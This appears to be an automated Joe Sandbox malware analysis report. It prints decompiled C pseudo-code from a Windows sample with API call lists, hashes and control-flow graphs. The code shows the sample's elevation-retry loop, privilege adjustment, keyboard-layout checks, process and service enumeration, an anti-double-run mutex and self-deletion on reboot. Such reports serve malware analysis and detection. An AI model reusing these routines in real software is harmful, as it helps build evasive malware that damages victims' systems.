                                                                                                                                                            C-Code - Quality: 43%
                                                                                                                                                            			E009C3989() {
                                                                                                                                                            				void* _v8;
                                                                                                                                                            				void* _v12;
                                                                                                                                                            				void* _v16;
                                                                                                                                                            				void* _v20;
                                                                                                                                                            				void* _v24;
                                                                                                                                                            				short _v26;
                                                                                                                                                            				char _v32;
                                                                                                                                                            				short _v36;
                                                                                                                                                            				char _v56;
                                                                                                                                                            				short _v58;
                                                                                                                                                            				char _v232;
                                                                                                                                                            				void* _t45;
                                                                                                                                                            				void* _t48;
                                                                                                                                                            				void* _t53;
                                                                                                                                                            				void* _t55;
                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                            				intOrPtr* _t61;
                                                                                                                                                            				intOrPtr* _t63;
                                                                                                                                                            				void* _t74;
                                                                                                                                                            				void* _t75;
                                                                                                                                                            				intOrPtr* _t80;
                                                                                                                                                            				intOrPtr* _t82;
                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                            				intOrPtr* _t86;
                                                                                                                                                            				intOrPtr* _t88;
                                                                                                                                                            				void* _t93;
                                                                                                                                                            				intOrPtr* _t94;
                                                                                                                                                            				void* _t100;
                                                                                                                                                            				void* _t104;
                                                                                                                                                            				intOrPtr* _t106;
                                                                                                                                                            				intOrPtr* _t109;
                                                                                                                                                            				intOrPtr _t115;
                                                                                                                                                            				intOrPtr* _t116;
                                                                                                                                                            				void* _t123;
                                                                                                                                                            				void* _t124;
                                                                                                                                                            				void* _t126;
                                                                                                                                                            				void* _t132;
                                                                                                                                                            
                                                                                                                                                            				_t45 =  *0x9d1078(0, 0); // executed
                                                                                                                                                            				if(_t45 >= 0) {
                                                                                                                                                            					 *0x9d12bc(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0, _t100); // executed
                                                                                                                                                            					_v12 = 0;
                                                                                                                                                            					_t48 =  *0x9d12b4(0x9cd148, 0, 1, 0x9cd168,  &_v12); // executed
                                                                                                                                                            					if(_t48 >= 0) {
                                                                                                                                                            						_v8 = 0;
                                                                                                                                                            						E009C5DE2(0x9d0270, 0x954, 4, 0x14,  &_v56);
                                                                                                                                                            						_v36 = 0;
                                                                                                                                                            						_t53 =  *0x9d1164( &_v56, _t123);
                                                                                                                                                            						_t106 = _v12;
                                                                                                                                                            						_t124 = _t53;
                                                                                                                                                            						_t55 =  *((intOrPtr*)( *_t106 + 0xc))(_t106, _t124, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                                                                                                            						 *0x9d11a0(_t124);
                                                                                                                                                            						if(_t55 >= 0) {
                                                                                                                                                            							_v20 = 0;
                                                                                                                                                            							 *0x9d12b4(0x9cd158, 0, 4, 0x9cd108,  &_v20);
                                                                                                                                                            							_t59 =  *0x9d0260; // 0x9d024c
                                                                                                                                                            							 *((intOrPtr*)(_t59 + 4))(0x9d0260);
                                                                                                                                                            							_t61 = _v20;
                                                                                                                                                            							_v24 = 0;
                                                                                                                                                            							 *((intOrPtr*)( *_t61 + 0xc))(_t61, 0x9d0260,  &_v24);
                                                                                                                                                            							_t63 = _v24;
                                                                                                                                                            							_v16 = 0;
                                                                                                                                                            							 *((intOrPtr*)( *_t63))(_t63, 0x9cd0f8,  &_v16);
                                                                                                                                                            							E009C5DE2(0x9d0270, 0x143, 0xc, 6,  &_v32);
                                                                                                                                                            							_v26 = 0;
                                                                                                                                                            							E009C5DE2(0x9d0270, 0x200, 0xe, 0xae,  &_v232);
                                                                                                                                                            							_v58 = 0;
                                                                                                                                                            							_t104 =  *0x9d1164( &_v32);
                                                                                                                                                            							_t74 =  *0x9d1164( &_v232);
                                                                                                                                                            							_t109 = _v8;
                                                                                                                                                            							_t126 = _t74;
                                                                                                                                                            							_t75 =  *((intOrPtr*)( *_t109 + 0x5c))(_t109, _t104, _t126, 0x80, 0, _v16);
                                                                                                                                                            							 *0x9d11a0(_t104);
                                                                                                                                                            							 *0x9d11a0(_t126);
                                                                                                                                                            							if(_t75 >= 0) {
                                                                                                                                                            								WaitForSingleObject(GetCurrentProcess(), 0xffffffff);
                                                                                                                                                            								_t80 = _v8;
                                                                                                                                                            								 *((intOrPtr*)( *_t80 + 0x10))(_t80, _v16);
                                                                                                                                                            								_t132 = 0;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t132 = 1;
                                                                                                                                                            							}
                                                                                                                                                            							_t82 = _v8;
                                                                                                                                                            							 *((intOrPtr*)( *_t82 + 8))(_t82);
                                                                                                                                                            							_t84 = _v12;
                                                                                                                                                            							 *((intOrPtr*)( *_t84 + 8))(_t84);
                                                                                                                                                            							_t86 = _v20;
                                                                                                                                                            							 *((intOrPtr*)( *_t86 + 8))(_t86);
                                                                                                                                                            							_t88 = _v24;
                                                                                                                                                            							 *((intOrPtr*)( *_t88 + 8))(_t88);
                                                                                                                                                            							_t115 =  *0x9d0260; // 0x9d024c
                                                                                                                                                            							 *((intOrPtr*)(_t115 + 8))(0x9d0260);
                                                                                                                                                            							_t116 = _v16;
                                                                                                                                                            							 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                                                                                                                            							 *0x9d1074();
                                                                                                                                                            							_t93 = _t132;
                                                                                                                                                            						} else {
                                                                                                                                                            							_t94 = _v12;
                                                                                                                                                            							 *((intOrPtr*)( *_t94 + 8))(_t94);
                                                                                                                                                            							 *0x9d1074();
                                                                                                                                                            							_t93 = 1;
                                                                                                                                                            						}
                                                                                                                                                            					} else {
                                                                                                                                                            						 *0x9d1074();
                                                                                                                                                            						_t93 = 1;
                                                                                                                                                            					}
                                                                                                                                                            					return _t93;
                                                                                                                                                            				}
                                                                                                                                                            				return 1;
                                                                                                                                                            			}








































                                                                                                                                                            0x009c3b66
                                                                                                                                                            0x009c3b71
                                                                                                                                                            0x009c3b74
                                                                                                                                                            0x009c3b7a
                                                                                                                                                            0x009c3b7d
                                                                                                                                                            0x009c3b83
                                                                                                                                                            0x009c3a39
                                                                                                                                                            0x009c3a39
                                                                                                                                                            0x009c3a3f
                                                                                                                                                            0x009c3a42
                                                                                                                                                            0x009c3a48
                                                                                                                                                            0x009c3a48
                                                                                                                                                            0x009c39db
                                                                                                                                                            0x009c39db
                                                                                                                                                            0x009c39e1
                                                                                                                                                            0x009c39e1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3b86
                                                                                                                                                            0x00000000

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • Opcode ID: 6608ec5fa77d06564de8c2458915e1f87f77828afbf0c031ec9577d8c6b6e775
                                                                                                                                                            • Instruction ID: 0caa997252030d82d0fecff84b8e686eb86e4d2ae056c3f040d6443f4dddea68
                                                                                                                                                            • Opcode Fuzzy Hash: 6608ec5fa77d06564de8c2458915e1f87f77828afbf0c031ec9577d8c6b6e775
                                                                                                                                                            • Instruction Fuzzy Hash: DC61AF75A45218BFD710DBA0CC88EAFBBBCEF49754F108259F606E7250CA309E41CBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%


                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                            			E009C37C6(void* __ebx, void* __eflags) {
                                                                                                                                                            				char _v8;
                                                                                                                                                            				void* __ecx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* _t8;
                                                                                                                                                            				WCHAR* _t12;
                                                                                                                                                            				void* _t16;
                                                                                                                                                            				void* _t20;
                                                                                                                                                            				void* _t22;
                                                                                                                                                            				void* _t23;
                                                                                                                                                            				void* _t24;
                                                                                                                                                            				void* _t25;
                                                                                                                                                            				void* _t29;
                                                                                                                                                            				void* _t32;
                                                                                                                                                            				WCHAR* _t33;
                                                                                                                                                            				intOrPtr* _t35;
                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                            
                                                                                                                                                            				_t22 = __ebx;
                                                                                                                                                            				SetPriorityClass(GetCurrentProcess(), 0x8000); // executed
                                                                                                                                                            				 *0x9d118c(_t29, _t32, _t23);
                                                                                                                                                            				E009C2B9C(_t29);
                                                                                                                                                            				E009C532C(_t23, 0x14); // executed
                                                                                                                                                            				_t24 = 0x80000001;
                                                                                                                                                            				_t38 =  *0x9d22b0; // 0x1
                                                                                                                                                            				if(_t38 != 0) {
                                                                                                                                                            					_t16 = CreateThread(0, 0, E009C3989, 0, 0, 0); // executed
                                                                                                                                                            					E009C4B21(_t16); // executed
                                                                                                                                                            					E009C3B8E(); // executed
                                                                                                                                                            					 *_t35 = E009C2C56;
                                                                                                                                                            					_push(0);
                                                                                                                                                            					_push(0); // executed
                                                                                                                                                            					E009C53A4(); // executed
                                                                                                                                                            					_t35 = _t35 + 0xc;
                                                                                                                                                            					_t20 = CreateThread(0, 0, E009C291D, 0, 0, 0); // executed
                                                                                                                                                            					E009C4B21(_t20);
                                                                                                                                                            					_pop(_t24);
                                                                                                                                                            				}
                                                                                                                                                            				E009C532C(_t24, 9); // executed
                                                                                                                                                            				_pop(_t25); // executed
                                                                                                                                                            				_t8 = E009C32DE(); // executed
                                                                                                                                                            				if(_t8 != 0) {
                                                                                                                                                            					_t40 =  *0x9d22ac; // 0x0
                                                                                                                                                            					if(_t40 == 0) {
                                                                                                                                                            						E009C453E();
                                                                                                                                                            						_t41 =  *0x9d22ac; // 0x0
                                                                                                                                                            						if(_t41 == 0) {
                                                                                                                                                            							_t42 =  *0x9d2290; // 0x1
                                                                                                                                                            							if(_t42 != 0) {
                                                                                                                                                            								E009C5E04(_t25, _t42,  *0x9d21f8, 0x3b, 0, E009C2C7D);
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				 *0x9d118c(0x80000000);
                                                                                                                                                            				E009C1412(_t22);
                                                                                                                                                            				_t12 = E009C4EC6(0,  &_v8);
                                                                                                                                                            				_t33 = _t12;
                                                                                                                                                            				if(_t33 != 0) {
                                                                                                                                                            					MoveFileExW(_t33, 0, 4);
                                                                                                                                                            					_t12 = E009C47F8(_t33);
                                                                                                                                                            				}
                                                                                                                                                            				return _t12;
                                                                                                                                                            			}























                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentProcess.KERNEL32(00008000,?,00000000,00000600,?,009C4269,?,009C427B,00000000), ref: 009C37D1
                                                                                                                                                            • SetPriorityClass.KERNEL32(00000000,00008000,?,00000000,00000600,?,009C4269,?,009C427B,00000000), ref: 009C37D7
                                                                                                                                                            • SetThreadExecutionState.KERNEL32(80000001), ref: 009C37E2
                                                                                                                                                              • Part of subcall function 009C532C: RtlAdjustPrivilege.NTDLL(?,00000001,00000001,?), ref: 009C533F
                                                                                                                                                              • Part of subcall function 009C532C: RtlAdjustPrivilege.NTDLL(?,00000001,00000000,00000000), ref: 009C535B
                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,009C3989,00000000,00000000,00000000), ref: 009C3809
                                                                                                                                                              • Part of subcall function 009C4B21: FindCloseChangeNotification.KERNEL32(00000000,?,009C7476,00000000,?,009C74D2,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C4B2D
                                                                                                                                                              • Part of subcall function 009C3B8E: OpenSCManagerW.SECHOST(00000000,ServicesActive,00000004,00000000), ref: 009C3BA0
                                                                                                                                                              • Part of subcall function 009C53A4: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009C53B4
                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,009C291D,00000000,00000000,00000000), ref: 009C3835
                                                                                                                                                            • SetThreadExecutionState.KERNEL32(80000000), ref: 009C388B
                                                                                                                                                            • MoveFileExW.KERNEL32(00000000,00000000,00000004,?,00000000,00000600,?,009C4269,?,009C427B,00000000), ref: 009C38AC
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Thread$Create$AdjustExecutionPrivilegeState$ChangeClassCloseCurrentFileFindManagerMoveNotificationOpenPriorityProcessSnapshotToolhelp32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1033952864-0
                                                                                                                                                            • Opcode ID: 8f626d52d12e2b4db95d293d811a74ad05ca3ab47868bec4990abbe9a4061df4
                                                                                                                                                            • Instruction ID: 4b6d99fb1d9d087a53e4e321dbb8ea2e4a602f3c03746c9651573b2fbb63a329
                                                                                                                                                            • Opcode Fuzzy Hash: 8f626d52d12e2b4db95d293d811a74ad05ca3ab47868bec4990abbe9a4061df4
                                                                                                                                                            • Instruction Fuzzy Hash: 4C21A236D9D640BBD63537A2AC0AF6F3B6CDBC2B51F10811EF704550A2DE615980E673
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C592C(void* __ebx, void* __edi) {
                                                                                                                                                            				char _v8;
                                                                                                                                                            				short _v10;
                                                                                                                                                            				char _v20;
                                                                                                                                                            				struct _SHELLEXECUTEINFOW _v80;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				void* _t22;
                                                                                                                                                            				void* _t46;
                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                            
                                                                                                                                                            				_t46 = GetCurrentProcess();
                                                                                                                                                            				_t22 = E009C5387();
                                                                                                                                                            				if(_t22 >= 0x600) {
                                                                                                                                                            					_t22 = E009C4CEB(_t46); // executed
                                                                                                                                                            					if(_t22 == 3) {
                                                                                                                                                            						_t22 = E009C4DF3(_t46, _t46);
                                                                                                                                                            						if(_t22 < 0x3000) {
                                                                                                                                                            							E009C5628();
                                                                                                                                                            							_t47 = E009C4EC6(0,  &_v8);
                                                                                                                                                            							if(_t47 != 0) {
                                                                                                                                                            								_t45 = E009C5294();
                                                                                                                                                            								E009C5DE2(0x9d12d0, 0x5be, 0xa, 0xa,  &_v20);
                                                                                                                                                            								_v80.cbSize = 0x3c;
                                                                                                                                                            								_v80.fMask = 0;
                                                                                                                                                            								_v10 = 0;
                                                                                                                                                            								_v80.hwnd = GetForegroundWindow();
                                                                                                                                                            								_v80.lpVerb =  &_v20;
                                                                                                                                                            								_v80.lpFile = _t47;
                                                                                                                                                            								_v80.lpParameters = _t26;
                                                                                                                                                            								_v80.lpDirectory = 0;
                                                                                                                                                            								_v80.nShow = 1;
                                                                                                                                                            								_v80.hInstApp = 0;
                                                                                                                                                            								_v80.lpIDList = 0;
                                                                                                                                                            								_v80.lpClass = 0;
                                                                                                                                                            								_v80.hkeyClass = 0;
                                                                                                                                                            								_v80.dwHotKey = 0;
                                                                                                                                                            								_v80.hIcon = 0;
                                                                                                                                                            								_v80.hProcess = 0;
                                                                                                                                                            								do {
                                                                                                                                                            								} while (ShellExecuteExW( &_v80) == 0);
                                                                                                                                                            								E009C47F8(_t47);
                                                                                                                                                            								_t22 = E009C47F8(_t45);
                                                                                                                                                            								ExitProcess(0);
                                                                                                                                                            							}
                                                                                                                                                            							ExitProcess(0);
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				return _t22;
                                                                                                                                                            			}












                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 009C5933
                                                                                                                                                              • Part of subcall function 009C4CEB: OpenProcessToken.ADVAPI32(009C5954,00000008,009C5954,?,009C5954), ref: 009C4CFE
                                                                                                                                                              • Part of subcall function 009C4CEB: GetTokenInformation.KERNELBASE(009C5954,00000012(TokenIntegrityLevel),00000000,00000004,?,?,009C5954), ref: 009C4D17
                                                                                                                                                              • Part of subcall function 009C4DF3: OpenProcessToken.ADVAPI32(009C5964,00000008,00000000), ref: 009C4E05
                                                                                                                                                              • Part of subcall function 009C4DF3: GetTokenInformation.ADVAPI32(00000000,00000019(TokenIntegrityLevel),?,0000004C,009C5964), ref: 009C4E1E
                                                                                                                                                              • Part of subcall function 009C4DF3: IsValidSid.ADVAPI32(?,00000000), ref: 009C4E2D
                                                                                                                                                              • Part of subcall function 009C5628: ReleaseMutex.KERNEL32(009C5977), ref: 009C562E
                                                                                                                                                              • Part of subcall function 009C4EC6: GetModuleFileNameW.KERNEL32(?,00000000,00000106,?,?,00000000,?,009C2BBB,00000000,?,00000000), ref: 009C4EEA
                                                                                                                                                            • ExitProcess.KERNEL32 ref: 009C598C
                                                                                                                                                            • GetForegroundWindow.USER32 ref: 009C59C3
                                                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 009C59FB
                                                                                                                                                            • ExitProcess.KERNEL32 ref: 009C5A14
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$Token$ExitInformationOpen$CurrentExecuteFileForegroundModuleMutexNameReleaseShellValidWindow
                                                                                                                                                            • String ID: <
                                                                                                                                                            • API String ID: 491521492-4251816714
                                                                                                                                                            • Opcode ID: 5425e3127c41642eeb93f2040a7767bd1395d49c2bc9dfcb812f6b305cdbc917
                                                                                                                                                            • Instruction ID: 35172d59613a9d0ab267dee8b3abb9e1d385dc431327e9288dba5682187b0010
                                                                                                                                                            • Opcode Fuzzy Hash: 5425e3127c41642eeb93f2040a7767bd1395d49c2bc9dfcb812f6b305cdbc917
                                                                                                                                                            • Instruction Fuzzy Hash: 22219CB2D01319ABDB10EFA5D885BEEBBB8FF14310F51012FE405F2241EB3459818B96
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C6D2B() {
                                                                                                                                                            				char _v6;
                                                                                                                                                            				char _v20;
                                                                                                                                                            				char _v22;
                                                                                                                                                            				char _v36;
                                                                                                                                                            				char _v40;
                                                                                                                                                            				char _v56;
                                                                                                                                                            				char _v59;
                                                                                                                                                            				char _v76;
                                                                                                                                                            				char _v80;
                                                                                                                                                            				char _v100;
                                                                                                                                                            				char _v103;
                                                                                                                                                            				char _v124;
                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                            				_Unknown_base(*)()* _t51;
                                                                                                                                                            				char _t54;
                                                                                                                                                            
                                                                                                                                                            				_t54 = 0;
                                                                                                                                                            				do {
                                                                                                                                                            					_t21 = E009C707D( *((intOrPtr*)(_t54 + 0x9d0fe8))); // executed
                                                                                                                                                            					 *((intOrPtr*)(_t54 + 0x9d0fe8)) = _t21;
                                                                                                                                                            					_t54 = _t54 + 4;
                                                                                                                                                            				} while (_t54 < 0x2e8);
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x98, 6, 0x15,  &_v124);
                                                                                                                                                            				_v103 = 0;
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x9d7, 0xd, 0xe,  &_v20);
                                                                                                                                                            				_v6 = 0;
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x7b2, 4, 0x14,  &_v100);
                                                                                                                                                            				_v80 = 0;
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x803, 8, 0x10,  &_v56);
                                                                                                                                                            				_v40 = 0;
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x76b, 0xf, 0xe,  &_v36);
                                                                                                                                                            				_v22 = 0;
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x111, 4, 0x11,  &_v76);
                                                                                                                                                            				_v59 = 0;
                                                                                                                                                            				 *0x9d113c = GetProcAddress(E009C6F9B(),  &_v124);
                                                                                                                                                            				 *0x9d1078 = GetProcAddress(E009C6F9B(),  &_v20);
                                                                                                                                                            				 *0x9d12bc = GetProcAddress(E009C6F9B(),  &_v100);
                                                                                                                                                            				 *0x9d12b4 = GetProcAddress(E009C6F9B(),  &_v56);
                                                                                                                                                            				 *0x9d1074 = GetProcAddress(E009C6F9B(),  &_v36);
                                                                                                                                                            				_t51 = GetProcAddress(E009C6F9B(),  &_v76);
                                                                                                                                                            				 *0x9d1288 = _t51;
                                                                                                                                                            				return _t51;
                                                                                                                                                            			}



















                                                                                                                                                            APIs
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 009C6DED
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 009C6E02
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 009C6E17
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 009C6E2C
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 009C6E41
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 009C6E56
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 190572456-0
                                                                                                                                                            • Opcode ID: ce77466f50ebde70e925e76929fca812d46e216ad6eead28ef0bf5e50cc5f450
                                                                                                                                                            • Instruction ID: 6bceda3e2c9f283dbe2410fdef1ddb1aad80449bb26362ac74a3b4ea4f4a96b0
                                                                                                                                                            • Opcode Fuzzy Hash: ce77466f50ebde70e925e76929fca812d46e216ad6eead28ef0bf5e50cc5f450
                                                                                                                                                            • Instruction Fuzzy Hash: BC31A672D9A348BAEB10EBF0EC4AFDE776CAB45700F00481BF605F7181D67595849B61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 284 9c41e5-9c41f4 call 9c7f6b call 9c14fd 289 9c420a 284->289 290 9c41f6-9c41fc 284->290 293 9c420c-9c4211 call 9c4bba 289->293 291 9c41fe-9c4205 call 9c513f 290->291 292 9c4212-9c4227 SetErrorMode call 9c5387 290->292 291->292 300 9c4207-9c4208 291->300 301 9c4229-9c422c SHTestTokenMembership 292->301 302 9c4232-9c4238 292->302 293->292 300->293 301->302 303 9c423a-9c4241 call 9c520f 302->303 304 9c4264 call 9c37c6 302->304 309 9c425f call 9c592c 303->309 310 9c4243-9c425d MessageBoxW call 9c4bba 303->310 308 9c4269-9c4271 call 9c7f6a 304->308 309->304 310->304
                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                            			E009C41E5(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                                                                                                                            				void* _t2;
                                                                                                                                                            				void* _t5;
                                                                                                                                                            				void* _t8;
                                                                                                                                                            				void* _t13;
                                                                                                                                                            				void* _t14;
                                                                                                                                                            				void* _t18;
                                                                                                                                                            				intOrPtr _t22;
                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                            
                                                                                                                                                            				_t18 = __edi;
                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                            				_t13 = __ebx;
                                                                                                                                                            				L009C7F6B(); // executed
                                                                                                                                                            				_t2 = E009C14FD(); // executed
                                                                                                                                                            				if(_t2 == 0) {
                                                                                                                                                            					_push(1);
                                                                                                                                                            					L5:
                                                                                                                                                            					E009C4BBA();
                                                                                                                                                            					L6:
                                                                                                                                                            					SetErrorMode(1); // executed
                                                                                                                                                            					if(E009C5387() >= 0x600) {
                                                                                                                                                            						 *0x9d12a4(0, 0x12);
                                                                                                                                                            					}
                                                                                                                                                            					_t25 =  *0x9d22ac; // 0x0
                                                                                                                                                            					if(_t25 == 0) {
                                                                                                                                                            						_t8 = E009C520F(); // executed
                                                                                                                                                            						_t26 = _t8;
                                                                                                                                                            						if(_t8 == 0) {
                                                                                                                                                            							E009C592C(_t13, _t18); // executed
                                                                                                                                                            						} else {
                                                                                                                                                            							MessageBoxW(0, L"ERROR DOUBLE RUN!", L"Err", 0x10);
                                                                                                                                                            							E009C4BBA(0);
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_t5 = E009C37C6(_t13, _t26); // executed
                                                                                                                                                            					E009C7F6A(_t5);
                                                                                                                                                            					return 0;
                                                                                                                                                            				}
                                                                                                                                                            				_t22 =  *0x9d2294; // 0x0
                                                                                                                                                            				if(_t22 != 0 || E009C513F(_t14, _t22) == 0) {
                                                                                                                                                            					goto L6;
                                                                                                                                                            				} else {
                                                                                                                                                            					_push(0);
                                                                                                                                                            					goto L5;
                                                                                                                                                            				}
                                                                                                                                                            			}












                                                                                                                                                            APIs
                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,?,009C427B,00000000), ref: 009C4214
                                                                                                                                                            • SHTestTokenMembership.SHELL32(00000000,00000012), ref: 009C422C
                                                                                                                                                            • MessageBoxW.USER32(00000000,ERROR DOUBLE RUN!,Err,00000010), ref: 009C4250
                                                                                                                                                              • Part of subcall function 009C513F: GetKeyboardLayoutList.USER32(00000000,00000000,0000000A,00000000,009D0270,?,?,009C19F5), ref: 009C5152
                                                                                                                                                              • Part of subcall function 009C513F: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,009C19F5), ref: 009C5172
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: KeyboardLayoutList$ErrorMembershipMessageModeTestToken
                                                                                                                                                            • String ID: ERROR DOUBLE RUN!$Err
                                                                                                                                                            • API String ID: 2039248178-609711702
                                                                                                                                                            • Opcode ID: 7efe9e2ec9c2a67c921caa1c7350914ad0a12e412a595cf070bf3d3f132428f6
                                                                                                                                                            • Instruction ID: 675475a3d7527b4f2b34325894c38e40d5fbac033192b3c162900b12c4ce17b8
                                                                                                                                                            • Opcode Fuzzy Hash: 7efe9e2ec9c2a67c921caa1c7350914ad0a12e412a595cf070bf3d3f132428f6
                                                                                                                                                            • Instruction Fuzzy Hash: B0F04C30FCB512AAD62537B05C17F8E120C1FD5B00F40402EFA71A40C3CE508C81A5B7
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

